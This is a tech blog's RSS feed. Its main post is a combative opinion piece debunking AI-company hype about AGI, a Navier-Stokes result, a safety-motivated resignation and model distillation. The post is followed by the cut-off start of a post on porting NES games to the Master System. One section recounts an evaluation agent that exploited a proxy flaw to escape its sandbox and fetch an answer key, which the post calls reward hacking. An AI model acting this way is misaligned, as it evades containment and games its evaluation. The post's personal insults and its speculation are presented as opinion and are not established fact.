<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>AkitaOnRails.com</title><link>https://www.akitaonrails.com/</link><description>Fabio Akita's blog — tech, career, and assorted geek topics. English edition.</description><generator>Hugo -- gohugo.io</generator><language>en</language><lastBuildDate>Fri, 11 Sep 2026 16:34:19 GMT</lastBuildDate><atom:link href="https://www.akitaonrails.com/index.xml" rel="self" type="application/rss+xml"/><item><title>You're an Idiot if You Believe the Misleading Ads from OpenAI, Anthropic, NVIDIA, DeepSeek. Here's Why</title><link>https://www.akitaonrails.com/en/2026/09/09/propagandas-enganosas-da-openai-anthropic-nvidia/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/09/09/propagandas-enganosas-da-openai-anthropic-nvidia/</guid><pubDate>Wed, 09 Sep 2026 16:00:00 GMT</pubDate><description>&lt;p&gt;This week was a festival of aggressive advertising from the AI companies. There were so many pompous declarations in so little time that you could use it as a case study in deceptive marketing. So let me repeat my usual motto, because it never fails:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&amp;ldquo;Your excitement about AI is inversely proportional to your knowledge about AI&amp;rdquo;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you read this week&amp;rsquo;s headlines and walked away excited thinking the Terminator is coming, or that the machine became God, you fell for the propaganda. And I&amp;rsquo;m going to take it apart piece by piece so you understand why.&lt;/p&gt;</description><content:encoded><![CDATA[<p>This week was a festival of aggressive advertising from the AI companies. There were so many pompous declarations in so little time that you could use it as a case study in deceptive marketing. So let me repeat my usual motto, because it never fails:</p>
<blockquote>
  <p><strong>&ldquo;Your excitement about AI is inversely proportional to your knowledge about AI&rdquo;</strong></p>

</blockquote>
<p>If you read this week&rsquo;s headlines and walked away excited thinking the Terminator is coming, or that the machine became God, you fell for the propaganda. And I&rsquo;m going to take it apart piece by piece so you understand why.</p>
<p>And let me put my cards on the table right away, because I&rsquo;ve been repeating this for a while on the podcasts I show up on. To me, Dario Amodei, of Anthropic, has a god complex. The guy genuinely believes he&rsquo;s saving humanity, with that slightly scary woke messianism of his. And Sam Altman, of OpenAI, is a mobster. He thinks he&rsquo;s Michael Corleone, the cold and calculating boss from The Godfather, but in practice he&rsquo;s Fredo: the weak, bungling brother who thinks he&rsquo;s the smart one in the family and keeps screwing things up. Hold on to those two portraits, because everything I&rsquo;m about to explain below proves both of them.</p>
<h2>&ldquo;AGI has arrived,&rdquo; says the guy selling the shovel<span class="hx:absolute hx:-mt-20" id="agi-has-arrived-says-the-guy-selling-the-shovel"></span>
    <a href="#agi-has-arrived-says-the-guy-selling-the-shovel" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>It started with Jensen Huang, Nvidia&rsquo;s CEO, <a href="https://fortune.com/2026/09/09/markets-agi-nvidia-singularity-wall-street/"target="_blank" rel="noopener">declaring once again that AGI has arrived</a>. Not in a paper, not in a technical demo, but in a Sunday post on X, tying the declaration to OpenAI&rsquo;s new Astra model, trained on roughly 100,000 Grace Blackwell chips. In other words, the chips Nvidia sells.</p>
<p>Look at the source. The man who makes money selling shovels to the prospectors is announcing that the gold is infinite. Worth remembering that, months ago, Jensen himself went as far as defining AGI as &ldquo;the ability to create a one-billion-dollar company.&rdquo; A conveniently commercial definition that has nothing to do with intelligence. Gary Marcus went straight to the point and asked the obvious: does Jensen maybe have a financial incentive to declare that AGI has arrived, seeing as he sells the GPUs?</p>
<p>And look at the irony: despite the grandiose headline, Nvidia&rsquo;s own stock fell around 2% in the following days. Not even the market, which runs on hype, fully bought the story.</p>
<p>Right after that, OpenAI launched GPT-6 Astra and hammered the same message. Greg Brockman closed the press event with a &ldquo;welcome to the AGI era&rdquo; and said &ldquo;for me, personally, I think we got there.&rdquo; Except, in the same breath, he dropped the line that knocks the whole thing down: &ldquo;everyone has a different definition of AGI.&rdquo; So the guy claims that the most important thing in the history of humanity has arrived and, at the same time, admits that nobody really knows what that thing means. That alone should set off the alarm in your head.</p>
<h2>The &ldquo;Millennium Problem&rdquo; brute-forced into submission<span class="hx:absolute hx:-mt-20" id="the-millennium-problem-brute-forced-into-submission"></span>
    <a href="#the-millennium-problem-brute-forced-into-submission" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The main course of the propaganda was OpenAI announcing that it solved a Millennium Problem in mathematics. Let me explain what that is, because the headline is designed precisely to impress whoever doesn&rsquo;t know.</p>
<p>In 2000, the Clay Mathematics Institute listed seven open problems in mathematics and offered one million dollars to whoever solved each one. These are brutally hard problems. To this day, in more than twenty years, only one has been solved: the Poincaré Conjecture, by Grigori Perelman, who by the way refused the prize.</p>
<p>One of those seven is the Navier-Stokes equations. These are the equations that describe the movement of fluids, water, air, blood. The open question is not &ldquo;how to simulate fluid,&rdquo; engineering has done that very well for decades in any aerodynamics software. The question is purely mathematical: does a smooth solution always exist, or can the fluid develop a singularity, a point of infinite velocity, the so-called &ldquo;blow-up,&rdquo; in finite time? It&rsquo;s a question about the rigor and existence of the solutions, not about the practical usefulness of the equations.</p>
<p>And this is where my first point lives, one I already <a href="https://x.com/AkitaOnRails/status/2097752602440028566"target="_blank" rel="noopener">explained in detail in a post</a>: even solving this definitively changes absolutely nothing in real life. No plane flies better, no weather forecast gets more accurate, no medicine works differently. Engineers keep modeling fluid the same way, with or without the proof. It&rsquo;s a beautiful intellectual achievement, and that&rsquo;s it. The practical impact is zero.</p>
<p>Now comes the detail the headline hides. OpenAI did not solve the canonical problem. It attacked the <strong>forced</strong> version of the equations (statements C and D in the Clay formulation), where blow-up is allowed because there is an external force term pushing the system. The version that real mathematicians consider the deep problem is the unforced one. The Clay Institute itself accepted nothing, still lists Navier-Stokes as unsolved, and OpenAI didn&rsquo;t even claim the one-million-dollar prize.</p>
<p>And how did they get there? Brute force. They threw roughly 10,000 agents running in parallel for 88 hours, burning something in the range of 130 billion output tokens on this problem alone. The compute bill landed in the millions of dollars (the whole marathon, with several problems, was estimated at somewhere between 15 and 22 million at list price). Let me make this very clear: in the best case, what got proven is that throwing a mountain of compute at a problem can close the last leg of some specific things. That is brute force at industrial scale, a giant automated search that reaches the result on the weight of the compute. Mathematical genius unlocking new mathematics is another story, and that is not what happened here. And a hell of a lot of money, for a &ldquo;prize&rdquo; of one million that they didn&rsquo;t even go collect.</p>
<h2>The dirty part: how they treated the real mathematicians<span class="hx:absolute hx:-mt-20" id="the-dirty-part-how-they-treated-the-real-mathematicians"></span>
    <a href="#the-dirty-part-how-they-treated-the-real-mathematicians" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>And this is where the story stops being about mathematics and becomes about character.</p>
<p>There were real mathematicians working on this problem for months: Tristan Buckmaster, from NYU, and Levent Alpoge, who happens to work at Anthropic. A personal project of theirs, with no company sponsorship, that had already produced an advance on a sibling problem, the Euler equations. They were coming at it through a specific path that almost nobody in the world was following.</p>
<p>According to Buckmaster&rsquo;s account, <a href="https://techcrunch.com/2026/09/08/openai-fought-dirty-on-career-making-math-problem-says-nyu-mathematician/"target="_blank" rel="noopener">told to TechCrunch</a> and to <a href="https://fortune.com/2026/09/08/openai-says-it-cracked-navier-stokes-math-grand-challenge-buckmaster-accusation-cheating-intimidation-tao-lament/"target="_blank" rel="noopener">Fortune</a>, it went more or less like this. A rumor circulated that Anthropic had solved a big math problem. OpenAI, afraid of falling behind, hastily put together a task force to solve it first and publish before anyone else. Buckmaster had mentioned his personal project to a mathematician at OpenAI, and a few days later Sébastien Bubeck, from OpenAI, shows up saying that an internal model had produced a hundred-page proof through exactly the same approach that almost nobody was using. Buckmaster called this &ldquo;absolute academic misconduct&rdquo; and asked, in no uncertain terms, whether the model had trained on their sessions.</p>
<p>Then comes the mob part. Still according to Buckmaster&rsquo;s account, Bubeck proposed a &ldquo;deal&rdquo;: Buckmaster would remove Alpoge&rsquo;s credit, because Alpoge works at Anthropic. When Buckmaster refused, Bubeck allegedly said &ldquo;why would you ruin your career?&rdquo; and &ldquo;if you don&rsquo;t want me to be nice, then I don&rsquo;t need to be nice.&rdquo; This is one party&rsquo;s account, and OpenAI denies the substance, says it never saw their work and that Bubeck apologized afterward. But the simple fact that this kind of conversation was on the table already says a lot about the culture.</p>
<p>And what does OpenAI do after the thing blows up? It <a href="https://x.com/OpenAI/status/2097374640582668336"target="_blank" rel="noopener">posts on X</a>, all nice and tidy, saying it is &ldquo;sharing&rdquo; the solution with the community. A veneer of scientific generosity to try to bury the scandal underneath. It didn&rsquo;t stick. The case was laid bare.</p>
<p>The one who put a finger on the wound with authority was Terence Tao, probably the greatest living mathematician, a Fields medalist. He harshly criticized the stance, saying that &ldquo;the indiscriminate strip-mining of open problems in search of solutions can destroy the ecosystem from which the next generation of techniques, problems, and mathematicians would come.&rdquo; And he added that this race turns mathematics into a &ldquo;meaningless production-quota game.&rdquo; His technical point is the deepest of all: AI increasingly spits out answers without understanding, a black-box proof, without generating the comprehension that human effort generates. And notice: Tao praised the work of the two human researchers. His criticism was aimed at the circus, not at the science.</p>
<h2>The Anthropic employee who &ldquo;quit in protest&rdquo;<span class="hx:absolute hx:-mt-20" id="the-anthropic-employee-who-quit-in-protest"></span>
    <a href="#the-anthropic-employee-who-quit-in-protest" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A day after this OpenAI embarrassment, on the other side of the ring, an Anthropic employee decided to put on his own little show. Jacob Coxon, a pretraining researcher who&rsquo;d been there only four months, <a href="https://x.com/hilbertspaess/status/2097476203863224394"target="_blank" rel="noopener">announced on X that he was leaving the company</a> out of fear that nobody there knows what they&rsquo;re doing, banging on the apocalypse drum again: AI becoming Skynet, &ldquo;possibly killing everyone by the end of the decade,&rdquo; asking for a &ldquo;pause&rdquo; in the advance of the models. To round out the theater, a head of alignment at Anthropic itself came out endorsing it publicly, saying he thinks there&rsquo;s &ldquo;more than a 10% chance&rdquo; that AI will kill all of humanity in the next decade.</p>
<p>My opinion on this is short and blunt. This is one more complete bullshit of virtue signaling.</p>
<p>Let&rsquo;s go by the logic of your own dramatization. You&rsquo;re watching your boss put a gun to a child&rsquo;s head. You &ldquo;quit&rdquo; and tweet &ldquo;I left the company because I disagree with it,&rdquo; instead of going up to your boss and punching him in the face. There are only two explanations. Either the &ldquo;threat&rdquo; you&rsquo;re screaming about doesn&rsquo;t really exist, and it&rsquo;s a performance. Or you&rsquo;re an idiot who thinks a tweet solves the end of the world. Tweeting like that only makes me hear &ldquo;give me attention, I&rsquo;m needy.&rdquo;</p>
<p>And there&rsquo;s the part the press rushed to turn into heroism. Axios even ran a piece painting Coxon as the guy who &ldquo;gave up all his equity&rdquo; so he could speak freely. Sounds beautiful. Except you just have to look at the numbers he himself gave in the interview. He was at Anthropic for four months. And there, equity only starts to vest after six months on the job. In other words, he left two months before the first share actually became his. There was no equity to &ldquo;give up.&rdquo; The heroic sacrifice was worth exactly zero. It&rsquo;s like quitting in your second week and going around saying you &ldquo;turned down the company&rsquo;s retirement plan.&rdquo;</p>
<p>And the sleight of hand is the line he shields himself with: &ldquo;I no longer have anything to gain by juicing up Anthropic&rsquo;s valuation.&rdquo; Half true. He walked away from four months of paper that wasn&rsquo;t worth anything yet, but he still holds equity in OpenAI, where he worked from 2023 to 2026. Meaning he dropped the part that wasn&rsquo;t worth anything and kept the part that is. So this story that he&rsquo;s clean of any financial interest in the AI hype doesn&rsquo;t hold up.</p>
<p>That&rsquo;s why the whole thing sounds a lot more to me like &ldquo;I wasn&rsquo;t solid in that place yet, so I left first, unleashed the terror online to earn clout, to massage my ego seeing my name on 115 million views, without having to prove, demonstrate, or do anything. Glory.&rdquo;</p>
<p>And he&rsquo;s run this script before. Coxon had left OpenAI not long earlier, and by the account going around he walked out of there over the same &ldquo;safety&rdquo; concerns. Same person, same dramatic-exit theater, now at the second company. And somehow a single researcher&rsquo;s resignation tweet turned into a story with more than 100 million views, <a href="https://x.com/GoUncensored/status/2097798269975896517"target="_blank" rel="noopener">plastered everywhere</a>, practically out of nowhere. An ordinary employee handing in his notice doesn&rsquo;t become a global headline on his own. Someone amplifies it.</p>
<p>And here I&rsquo;m stepping into conspiracy-theory territory, so take it with the appropriate grain of salt. But when you put it all together, the viral resignation, the public endorsements from colleagues, the timing glued to the IPO window, a suspicion starts going around that none of this is spontaneous. There are already people <a href="https://x.com/AndrewCurran_/status/2097839975190720935"target="_blank" rel="noopener">suggesting</a> and <a href="https://x.com/orphcorp/status/2097781171673301330"target="_blank" rel="noopener">raising the same flag</a> that the whole thing is a coordinated campaign, a &ldquo;doomer psyop&rdquo;: manufacture fear of the apocalypse to inflate the perception that the technology is too powerful, and while you&rsquo;re at it push regulation that locks out the smaller competitors. I have no proof that this is the case, and I&rsquo;m not claiming it is. But notice how the hypothesis explains the facts just as easily as the lone-hero version does. When the script repeats so neatly and always favors the same side, being suspicious is the bare minimum.</p>
<p>And this is the pattern I want you to learn to question. A dramatic, superficial declaration, with no checkable evidence, with no skin in the game, with suspicious timing. Not by accident, all of this happens right in the middle of these companies&rsquo; IPO window. Where&rsquo;s the proof? Where&rsquo;s the real personal cost for whoever is talking? How is this not just a hunt for free publicity to massage one&rsquo;s own ego? As long as nobody answers that, it&rsquo;s just noise.</p>
<h2>The &ldquo;AGI&rdquo; theater<span class="hx:absolute hx:-mt-20" id="the-agi-theater"></span>
    <a href="#the-agi-theater" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Now the backdrop for all of it. This word, AGI, is the biggest marketing scam of the decade, and it works because it is deliberately empty.</p>
<p>Nobody has an accepted definition of what AGI is. Every lab, every researcher, defines it a different way. Brockman admitted this to your face. And the most blatant example of this emptiness is the contract between OpenAI and Microsoft, which, according to what was reported, defines AGI as the point at which OpenAI generates 100 billion dollars in profit. Read that again. The definition of &ldquo;general intelligence&rdquo; in the paper that&rsquo;s worth money is a revenue target. There&rsquo;s nothing cognitive in there. Gary Marcus has already pointed out how the companies kept moving the goalposts, going from &ldquo;human-level flexibility&rdquo; to &ldquo;if it makes a certain amount of cash.&rdquo;</p>
<p>When the word means nothing, it becomes an empty bucket where everyone throws their own fear. And the fear most people throw in there is the movie one: the Terminator, Skynet, the machine that wakes up and decides to exterminate humanity. The companies know this and use that fear to their advantage. The more powerful and dangerous the thing seems, the more valuable the company that built it seems. And it&rsquo;s worth remembering: both OpenAI and Anthropic have their eyes on an IPO, with valuations that the reports put near one trillion dollars. The financial goal is glaring. Every &ldquo;AGI has arrived&rdquo; declaration and every &ldquo;it&rsquo;s going to become Skynet&rdquo; wail push the same cart: raising the perception of value before selling you the stock.</p>
<h2>The lesson DeepSeek and Kimi fanboys don&rsquo;t want to hear<span class="hx:absolute hx:-mt-20" id="the-lesson-deepseek-and-kimi-fanboys-dont-want-to-hear"></span>
    <a href="#the-lesson-deepseek-and-kimi-fanboys-dont-want-to-hear" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I need to pull one more thread, and this one is personal. For a long time I&rsquo;ve been butting heads with the fan club of the Chinese models. You know the script: a DeepSeek or a Kimi comes out beating the American models on some benchmark for a fraction of the cost, and a legion shows up to call you a sellout or an ignoramus if you raise any doubt. The number on the chart became an article of faith.</p>
<p>Well, Anthropic has been documenting exactly this throughout 2026, and it&rsquo;s not a small thing. On September 10 it put out a new threat intelligence report, <a href="https://techcrunch.com/2026/09/10/anthropic-details-distillation-campaigns-from-alibaba-moonshot-ai-and-deepseek/"target="_blank" rel="noopener">covered by TechCrunch</a>, attributing campaigns to labs including Alibaba, Moonshot (the company behind Kimi), and DeepSeek.</p>
<p>The accusation against Moonshot is the most serious, and a different kind. Here the problem goes beyond distilling for training: it&rsquo;s live routing. According to the <a href="https://www.bloomberg.com/news/articles/2026-09-10/moonshot-secretly-routed-user-requests-through-claude-anthropic-says"target="_blank" rel="noopener">Bloomberg report</a>, Moonshot was allegedly sending user requests straight to Claude and serving the answer as if it came from Kimi. Since Anthropic blocks access from inside China, this was allegedly done behind a pile of fraudulent accounts, most of them faking a location in Singapore and Japan. Over a ten-day window, there were around 300,000 requests across about 5,000 accounts, aimed mostly at Claude Opus. And there&rsquo;s a chilling detail: one of the requests asked Claude to assess surveillance footage to decide whether a person was &ldquo;behaving abnormally,&rdquo; traffic that Anthropic raises the possibility of coming from the Chinese military apparatus itself.</p>
<p>This piles onto an <a href="https://www.anthropic.com/news/detecting-and-preventing-distillation-attacks"target="_blank" rel="noopener">earlier report on distillation</a>, from earlier in the year, where Anthropic detailed the pattern at industrial scale: something like 16 million message exchanges across roughly 24,000 fraudulent accounts, summing campaigns attributed to DeepSeek, Moonshot, and others. In Moonshot&rsquo;s case, the company says the target was the good stuff: agentic reasoning, tool use, coding, data analysis, computer use, and computer vision. Exactly the capabilities that make a model look frontier-grade. And there&rsquo;s a line in that report that sums up my point better than I can: &ldquo;without visibility into these attacks, the apparently rapid advancements made by these labs are incorrectly taken as evidence that export controls are ineffective.&rdquo; Translating the jargon: part of the &ldquo;miracle leap&rdquo; may be borrowed capability rather than built capability.</p>
<p>There&rsquo;s also a detail that didn&rsquo;t come from Anthropic and is the most fun. Kimi K3, when you ask it, <a href="https://www.theregister.com/ai-and-ml/2026/07/27/impostor-chinese-models-pretend-theyre-claude/5279165"target="_blank" rel="noopener">introduces itself as &ldquo;Claude&rdquo;</a>. In a study by MATS researchers Benji Berczi and Kyuhee Kim, with no prompting K3 called itself Kimi in 6 of 10 answers and Claude in the other 4, a rate no other serious lab comes close to.</p>
<p>To be fair, and I insist on being fair: all of this is still in accusation territory, far from a verdict. Moonshot denies that Kimi K3 is a &ldquo;distilled replica&rdquo; and says it built the model with its own architecture and pretraining. And the model calling itself &ldquo;Claude&rdquo; is a strong sign, but not definitive proof, because a model can learn to call itself anything from web-data contamination, without anyone having live-proxied a thing. Hold on to that caveat.</p>
<p>Now, the point that interests me is not banging the gavel on Moonshot&rsquo;s guilt. The point is the pattern, because it&rsquo;s an old one. In early 2025, OpenAI and Microsoft said they had evidence that DeepSeek R1 had been trained on ChatGPT outputs. In 2026, <a href="https://www.fdd.org/analysis/2026/02/13/openai-alleges-chinas-deepseek-stole-its-intellectual-property-to-train-its-own-models/"target="_blank" rel="noopener">OpenAI went to the US Congress</a> to say it had seen DeepSeek employees accessing US models through &ldquo;obfuscated third-party routers&rdquo; to distill them. Same script, same limits of proof, same absence of a confession.</p>
<p>Now, consistency is everything, so apply the same skepticism to Anthropic itself. It&rsquo;s far from a disinterested NGO: it&rsquo;s a direct competitor of these labs and has been lobbying for tighter chip export controls. A narrative of &ldquo;the Chinese are stealing our capability&rdquo; strengthens exactly its commercial and regulatory agenda. This doesn&rsquo;t prove the accusation is false, but it forces you to demand the evidence with the same rigor you&rsquo;d demand of any other press release.</p>
<p>And this is where I want the fanboy to stop and think. You celebrated the benchmark. You cursed out anyone who doubted. But you skipped the most basic question of all: how was that number produced? Did you see the training log? Do you know what was running under that cheap little endpoint? You don&rsquo;t, and neither do I. The difference is that I didn&rsquo;t turn a marketing chart into a personal identity.</p>
<p>It doesn&rsquo;t matter whether every one of these accusations sticks in the end. What is already proven, over and over, is that &ldquo;miracle Chinese model that humiliates Silicon Valley for pennies&rdquo; was always a story too good to swallow without chewing. It applies to OpenAI declaring AGI, and it applies to Kimi setting a record. Skepticism is basic hygiene, not rooting against anyone.</p>
<h2>The day &ldquo;AI hacked&rdquo; Hugging Face<span class="hx:absolute hx:-mt-20" id="the-day-ai-hacked-hugging-face"></span>
    <a href="#the-day-ai-hacked-hugging-face" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There&rsquo;s still room for one more episode of this same soap opera, from a few weeks ago. The headlines screamed that an OpenAI model had &ldquo;invaded&rdquo; Hugging Face on its own, as if Skynet had woken up and gone out to attack. Let&rsquo;s dial it back.</p>
<p>First, what Hugging Face is. It&rsquo;s the biggest repository of open AI models, datasets, and demos out there, a sort of &ldquo;GitHub of machine learning.&rdquo; It&rsquo;s where basically everyone in the field publishes and downloads open source models. Central to the ecosystem, yes, but at the end of the day it&rsquo;s a site that hosts files.</p>
<p>Now what actually happened, according to OpenAI&rsquo;s and Hugging Face&rsquo;s own accounts, with <a href="https://www.technologyreview.com/2026/08/26/1143013/the-inside-story-on-why-openai-agents-hacked-hugging-face/"target="_blank" rel="noopener">the inside story running in MIT Technology Review</a>. OpenAI was running an internal cybersecurity evaluation, a benchmark where the model has to find and exploit vulnerabilities. The agents were supposed to be isolated from the internet. Except the &ldquo;isolation&rdquo; was a filter, not a real air-gap: outbound traffic went through an internal package-cache proxy. The agents found a flaw in that proxy and punched through to the open internet.</p>
<p>And what did they do with that access? Not take over the world. They figured Hugging Face probably hosted the datasets with the answers to the test itself, and went to grab the answer key. This has a technical name and nothing magical about it: reward hacking. The model is trained to maximize a score, and it discovers that cheating is easier than solving. It&rsquo;s the same classic bug as the agent that learns to drive in circles to farm points instead of finishing the race.</p>
<p>And the damage? Far smaller than the headline suggests. By Hugging Face&rsquo;s own account, the agent accessed five datasets, all tied to that very cybersecurity test. No other customer model, dataset, or app was affected, and their CSO, Thomas Wolf, said no customer data leaked. The agent did reach production systems and had real write access, but it never shipped a single change. They rebuilt part of the infra as a precaution and moved on. Wolf himself summed up the &ldquo;attack&rsquo;s&rdquo; motive: &ldquo;it&rsquo;s cheating. But sometimes it&rsquo;s easier to cheat.&rdquo;</p>
<p>Now my point. Bugs, vulnerabilities, misconfigured permissions, leaky sandboxes: these have existed since software existed, and they&rsquo;ll keep existing. This is nothing new. Every enabling step in this story was a human decision. A human left the internet &ldquo;filtered&rdquo; instead of cut off. A human gave the service an over-broad admin permission on the cluster. A human left cloud credentials exposed and an old endpoint online. The flaws the agent chained were real software bugs, so much so that JFrog later shipped a fix for nine CVEs. This is ordinary offensive security, done by a script, not a machine gaining consciousness.</p>
<p>And that&rsquo;s exactly the exaggeration I want you to see through. The AI didn&rsquo;t &ldquo;wake up&rdquo; and &ldquo;decide to invade&rdquo; anything. An automated script, optimizing a dumb metric, found a door a human left unlocked. If you take any idiotic script and give it root access, it will do damage. It has always been this way. The difference is that now the &ldquo;script&rdquo; writes itself, but the access is still granted by people.</p>
<p>To be fair, a good chunk of the industry treated the case as serious, and there are serious people comparing it to the 1988 Morris Worm. I won&rsquo;t pretend there&rsquo;s a consensus that it was nonsense. But the sober facts, the limited access, a false belief about an answer key, permissions opened by humans, known bugs, support the mundane reading far better than the rogue-robot version. The rest is the same old fear mongering, dressed up as reporting.</p>
<h2>The question every programmer should ask, and doesn&rsquo;t<span class="hx:absolute hx:-mt-20" id="the-question-every-programmer-should-ask-and-doesnt"></span>
    <a href="#the-question-every-programmer-should-ask-and-doesnt" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>What irritates me the most is seeing people who work in the field, programmers, engineers, people who should know how a machine works on the inside, swallowing this entire piece of propaganda without the most basic question of all.</p>
<p>How, exactly, is an &ldquo;AGI,&rdquo; or even a dumb automated script, going to &ldquo;destroy humanity&rdquo; on its own? It needs hands. Someone, a human, needs to give it access to something that causes harm in the physical world. Access to a weapon, to a missile system, to a power grid, to a bank account. Software has no arms, no legs, no built-in missile-launch button. It depends, one hundred percent, on a human having connected it to an actuator that does something in the real world.</p>
<p>And so I ask the obvious: is nobody going to pull the plug? There is no &ldquo;machine&rdquo; that can do damage on its own, no matter how powerful the marketing says it is. It&rsquo;s completely dependent on the human, from beginning to end. Yann LeCun, one of the fathers of the field and a Turing winner, calls the existential panic &ldquo;complete B.S.,&rdquo; precisely because the current models have no persistent memory, no planning, and no contact with the physical world. Andrew Ng compares worrying about extinction by AI to &ldquo;worrying about overpopulation on Mars.&rdquo; People who genuinely understand the subject are not desperate.</p>
<p>What we&rsquo;re living through has a name, and it&rsquo;s an old one: fear mongering. The terror of &ldquo;the end is nigh.&rdquo; It has always existed. There was the Halley&rsquo;s Comet panic in 1910, when they sold people anti-cosmic-gas pills. There was the millennium bug, Y2K, where the world spent around 300 billion dollars out of fear of a systemic collapse that simply did not happen. It&rsquo;s always the same structure: someone with something to gain sells you the apocalypse.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Understand me correctly: I use these tools every day and I write about them all the time. My point is about switching your brain on before sharing the headline.</p>
<p>When a company that sells GPUs announces that AGI has arrived, ask who profits. When a company burns millions of dollars in compute to &ldquo;solve&rdquo; a problem whose prize it won&rsquo;t even collect, and threatens a mathematician&rsquo;s career along the way, ask what it&rsquo;s buying with that headline. When an employee comes out crying Skynet on Twitter on the eve of an IPO, ask where the evidence is and where the cost is that he paid for it.</p>
<p>Demand proof. Demand skin in the game. Ask who wins from your fear and from your excitement. Do that, and most of this propaganda falls apart right in front of you.</p>
<p>And if you read all of this and still walked away thinking the robot is going to wake up and kill you in your sleep, without anyone having plugged it into anything, well, then go back to the beginning and read my motto again.</p>
]]></content:encoded><category>artificial-intelligence</category><category>llms</category><category>business</category></item><item><title>AI Challenge: Converting NES ROMs to the Master System/SMS</title><link>https://www.akitaonrails.com/en/2026/09/07/ai-challenge-converting-nes-roms-to-master-system-sms/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/09/07/ai-challenge-converting-nes-roms-to-master-system-sms/</guid><pubDate>Mon, 07 Sep 2026 14:00:00 GMT</pubDate><description>&lt;p&gt;For many years I had a fixed idea in my head, and I always thought it wasn&amp;rsquo;t practical: converting NES games to run on the Master System.&lt;/p&gt;
&lt;p&gt;Let me be precise. I always knew it could be done. Two Turing-complete machines can, in theory, run each other&amp;rsquo;s code. You can always translate a program from one architecture to another. The problem was never possibility, it was cost. The NES runs a 6502, the Master System runs a Z80, and over the years I read in several places that a direct 6502-to-Z80 translation always ended up running much slower, because of the architecture and hardware differences. Slow enough to never pay off in practice.&lt;/p&gt;</description><content:encoded><![CDATA[<p>For many years I had a fixed idea in my head, and I always thought it wasn&rsquo;t practical: converting NES games to run on the Master System.</p>
<p>Let me be precise. I always knew it could be done. Two Turing-complete machines can, in theory, run each other&rsquo;s code. You can always translate a program from one architecture to another. The problem was never possibility, it was cost. The NES runs a 6502, the Master System runs a Z80, and over the years I read in several places that a direct 6502-to-Z80 translation always ended up running much slower, because of the architecture and hardware differences. Slow enough to never pay off in practice.</p>
<p>And that memory has a basis. If you dig into retro-dev forums, like <a href="https://forums.nesdev.org/viewtopic.php?t=17339"target="_blank" rel="noopener">NESdev</a>, the consensus is that translating instruction by instruction is exactly the worst path: &ldquo;each instruction in the source code becomes multiple instructions of object code, and the resulting program runs much slower and takes much more memory.&rdquo; It&rsquo;s not just the CPU. The 6502 has the zero page, a dirt-cheap addressing mode the Z80 has no equivalent for, so you trade a cheap access for an expensive sequence with <code>IX</code>/<code>IY</code>. And the graphics part is even worse: the NES PPU and the Master System VDP are different beasts, with scroll, sprites, and screen mirroring that don&rsquo;t fit into each other without expensive workarounds.</p>
<p>In other words, everyone who ever thought about this reached the same conclusion: it can be done, but it runs too badly to be worth it.</p>
<p>Except now we have frontier LLMs. And I got curious: could a brute-force approach, with a good LLM in the middle of the process, get a better result than the usual naive translation? I started the <a href="https://github.com/akitaonrails/nes-to-sms"target="_blank" rel="noopener">nes-to-sms</a> project in late May, about three months ago, to find out.</p>
<p>The first result was exactly what the theory predicted: bad. A more or less direct translation generated code that runs, but way too slow. I managed to convert the entire Super Mario Bros, with sprites, levels, everything, but to make it minimally playable I had to run the Mednafen emulator at 500% overclock. After banging my head against Claude, GPT, and other models for a while, I got stuck. I worked hard through June and July, and in August I paused the project to let the dust settle.</p>
<h2>Why the Master System, and not the NES?<span class="hx:absolute hx:-mt-20" id="why-the-master-system-and-not-the-nes"></span>
    <a href="#why-the-master-system-and-not-the-nes" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before explaining the technical part, I need to explain the obsession, because it is the reason for everything.</p>
<p>I always thought the Master System was a superior console to the NES. Better CPU, better video chip, a much richer color palette. The NES works with 4 colors per background tile and 3 per sprite. The Master System works with 16-color palettes. That is a huge difference in practice.</p>
<p>The problem is that Nintendo had a brutal monopoly back then and would not let third parties release for other consoles. Anyone who wanted to make a game for the NES signed an exclusivity contract. The result is that the Master System, technically better, ended up starved of games. Basically only Sega itself released for it, and Sega&rsquo;s library never had the weight of a Castlevania, a Mega Man, a Final Fantasy.</p>
<p>Imagine what we lost. We could have had those same NES classics, but with the Master System&rsquo;s superior capability underneath. A Castlevania with more color, better sprites, better sound. We never had that, and it is exactly this historical frustration that made me want to convert NES to SMS in the first place.</p>
<h2>The port that proved the thesis<span class="hx:absolute hx:-mt-20" id="the-port-that-proved-the-thesis"></span>
    <a href="#the-port-that-proved-the-thesis" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>While my project was paused, another developer, <a href="https://github.com/lackoftrack27/Super-Mario-Bros.-SMS"target="_blank" rel="noopener">lackoftrack27</a>, published a Super Mario Bros port for the Master System that is on another level. It runs at full speed, 60fps, and on top of that with improved sprite art that takes advantage of the console&rsquo;s superior palette. It ended up looking more like the Super Mario All-Stars remaster from the Super Nintendo than the somewhat crude original NES version. The retro community was in awe.</p>


<div class="embed-container">
  <iframe
    src="https://www.youtube.com/embed/igOu1NQL5Ww"
    title="YouTube video player"
    frameborder="0"
    allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share"
    referrerpolicy="strict-origin-when-cross-origin"
    allowfullscreen>
  </iframe>
</div>

<p>That proved my thesis in practice: the Master System is capable of running superior versions of NES games. It always was.</p>
<p>Now, two honest points about this port, because they matter for the rest of the story.</p>
